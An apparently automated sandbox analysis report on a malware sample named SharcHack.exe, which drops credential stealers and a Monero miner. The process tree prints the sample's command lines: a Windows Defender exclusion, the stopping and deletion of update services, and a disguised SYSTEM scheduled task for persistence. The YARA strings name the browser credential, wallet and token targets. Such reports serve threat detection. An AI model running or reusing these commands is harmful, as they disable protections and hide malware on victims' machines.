Edit tour

Windows Analysis Report
SharcHack.exe

Overview

General Information

Sample name:	SharcHack.exe
Analysis ID:	1581756
MD5:	796310542e9fb2886de3f8cbdf88c9fa
SHA1:	01dc8e64ff23db2f177e3d999c12329bfcd206d3
SHA256:	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
Tags:	exeuser-aachum
Infos:

Detection

Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Yara detected Ades Stealer

Yara detected BlackGuard

Yara detected Nitro Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected VEGA Stealer

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses Register-ScheduledTask to add task schedules

Uses cmd line tools excessively to alter registry or file data

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

query blbeacon for getting browser version

Classification

Process Tree

System is w10x64

SharcHack.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\SharcHack.exe" MD5: 796310542E9FB2886DE3F8CBDF88C9FA)

3.exe (PID: 1988 cmdline: "C:\Users\user\AppData\Local\Temp\3.exe" MD5: A4C45AAF11FC601009A5682FD23790EE)

VegaStealer_v2.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe" MD5: 9F4F298BCF1D208BD3CE3907CFB28480)

v2.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\v2.exe" MD5: 3F62213D184B639A0A62BCB1E65370A8)

CheatEngine75.exe (PID: 2148 cmdline: "C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" MD5: CCEF241F10766A2E12298FBA4D319450)

CheatEngine75.tmp (PID: 6476 cmdline: "C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp" /SL5="$50416,29079073,832512,C:\Users\user\AppData\Local\Temp\CheatEngine75.exe" MD5: E652D75D1D0D3F03B6B730E064E9194C)

powershell.exe (PID: 6176 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3176 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5356 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 3292 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 1052 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2200 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2360 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

reg.exe (PID: 6532 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6520 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6180 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 5660 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6540 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6400 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6332 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 2820 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 5880 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 5524 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 3716 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1848 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6464 cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC MD5: 76CD6626DD8834BD4A42E6A565104DC2)

updater.exe (PID: 1396 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: A4C45AAF11FC601009A5682FD23790EE)

conhost.exe (PID: 360 cmdline: C:\Windows\System32\conhost.exe ubulqosn MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1196 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5416 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 360 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4984 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 4028 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7060 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2664 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

reg.exe (PID: 2800 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6768 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6176 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6400 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7088 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6728 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 5852 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 4956 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 344 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 2300 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 3528 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5520 cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5796 cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
BlackGuard	According to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.	No Attribution	https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/ https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer https://cyberint.com/blog/research/blackguard-stealer/ https://ke-la.com/information-stealers-a-new-landscape/ https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5	https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_NitroStealer	Yara detected Nitro Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_BlackGuard	Yara detected BlackGuard	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_AdesStealer	Yara detected Ades Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\v2.exe	infostealer_win_lighting	Detect the Lighting infostealer based on specific strings	Sekoia.io	0x34ee4:$str0: \logins.json 0x3cf55:$str1: key3.db 0x3aa9d:$str2: \key4.db 0x3cf75:$str3: cert9.db 0x3aaaf:$str4: \places.sqlite 0x2b8af:$str5: 7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9 0x3ce6d:$str6: potentiallyVulnerablePasswords 0x3a0c5:$dll0: \mozglue.dll 0x3a0df:$dll1: \nss3.dll 0x393f4:$dll2: SbieDll.dll 0x3ba1b:$app01: Software\Valve\Steam 0x3c604:$app02: Telegram Desktop\tdata 0x3c8b2:$app03: \Wallets\Armory\ 0x3c912:$app04: \Wallets\Atomic\Local Storage\leveldb\ 0x3cb82:$app05: \Exodus\exodus.wallet\ 0x3ce17:$app06: \Wallets\Zcash\ 0x3a43f:$app07: uCozMedia\Uran 0x3a917:$app08: Comodo\IceDragon 0x3a93b:$app09: 8pecxstudios\Cyberfox 0x3a969:$app10: NETGATE Technologies\BlackHaw 0x3a9a7:$app11: Moonchild Productions\Pale Moon
C:\Users\user\AppData\Local\Temp\v2.exe	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x2e307:$str01: set_sUsername 0x2e7b7:$str02: set_sIsSecure 0x2fd2b:$str03: set_sExpMonth 0x31eae:$str04: WritePasswords 0x3205b:$str05: WriteCookies 0x326fc:$str06: sChromiumPswPaths 0x326e9:$str07: sGeckoBrowserPaths 0x3ab3f:$str08: Username: {1} 0x3ab5b:$str09: Password: {2} 0x3d7b8:$str10: encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\v2.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x3b6f1:$f1: FileZilla\recentservers.xml 0x3473e:$b1: Chrome\User Data\ 0x347bc:$b1: Chrome\User Data\ 0x34822:$b1: Chrome\User Data\ 0x3a1b9:$b1: Chrome\User Data\ 0x3a239:$b1: Chrome\User Data\ 0x34e72:$b2: Mozilla\Firefox\Profiles 0x35159:$b4: Opera Software\Opera Stable\Login Data 0x35332:$b5: YandexBrowser\User Data\ 0x353be:$b5: YandexBrowser\User Data\ 0x35433:$b5: YandexBrowser\User Data\ 0x3a663:$b5: YandexBrowser\User Data\ 0x3cf55:$s1: key3.db 0x3aa9f:$s2: key4.db 0x3cf65:$s2: key4.db 0x34ee6:$s4: logins.json 0x3ce37:$s4: logins.json 0x3c9dc:$s7: wallet.dat 0x3ca0c:$s7: wallet.dat 0x3cad6:$s7: wallet.dat 0x3cd3d:$s7: wallet.dat
C:\Users\user\AppData\Local\Temp\v2.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3b4b5:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\v2.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x3c6da:$s1: \VPN\NordVPN 0x3c77e:$s1: \VPN\NordVPN 0x3c814:$s2: \VPN\OpenVPN 0x3c882:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\v2.exe	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x397af:$s6: Content-Disposition: form-data; name="document"; filename=" 0x3cb36:$s11: \Ethereum\keystore 0x395a2:$v1_5: sharedSecret 0x3a167:$v1_6: ":"([^"]+)" 0x31eae:$v1_8: WritePasswords 0x326e9:$v1_9: sGeckoBrowserPaths 0x2d926:$v1_10: get_sPassword
C:\Windows\Temp\cfoutowi.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 9 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NitroStealer	Yara detected Nitro Stealer	Joe Security
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlackGuard	Yara detected BlackGuard	Joe Security
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AdesStealer	Yara detected Ades Stealer	Joe Security
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3a4fd:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NitroStealer	Yara detected Nitro Stealer	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_BlackGuard	Yara detected BlackGuard	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_AdesStealer	Yara detected Ades Stealer	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3b2b5:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BlackGuard	Yara detected BlackGuard	Joe Security
00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
00000022.00000002.2634403580.00007FF619210000.00000004.00000001.01000000.00000017.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2f2e8:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: VegaStealer_v2.exe PID: 3252	JoeSecurity_NitroStealer	Yara detected Nitro Stealer	Joe Security
Process Memory Space: VegaStealer_v2.exe PID: 3252	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
Process Memory Space: VegaStealer_v2.exe PID: 3252	JoeSecurity_AdesStealer	Yara detected Ades Stealer	Joe Security
Process Memory Space: VegaStealer_v2.exe PID: 3252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VegaStealer_v2.exe PID: 3252	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: VegaStealer_v2.exe PID: 3252	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x129448:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: v2.exe PID: 5316	JoeSecurity_NitroStealer	Yara detected Nitro Stealer	Joe Security
Process Memory Space: v2.exe PID: 5316	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
Process Memory Space: v2.exe PID: 5316	JoeSecurity_AdesStealer	Yara detected Ades Stealer	Joe Security
Process Memory Space: v2.exe PID: 5316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: v2.exe PID: 5316	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: v2.exe PID: 5316	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x6dee0:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x19028c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.0.v2.exe.aa0000.0.unpack	JoeSecurity_NitroStealer	Yara detected Nitro Stealer	Joe Security
7.0.v2.exe.aa0000.0.unpack	JoeSecurity_BlackGuard	Yara detected BlackGuard	Joe Security
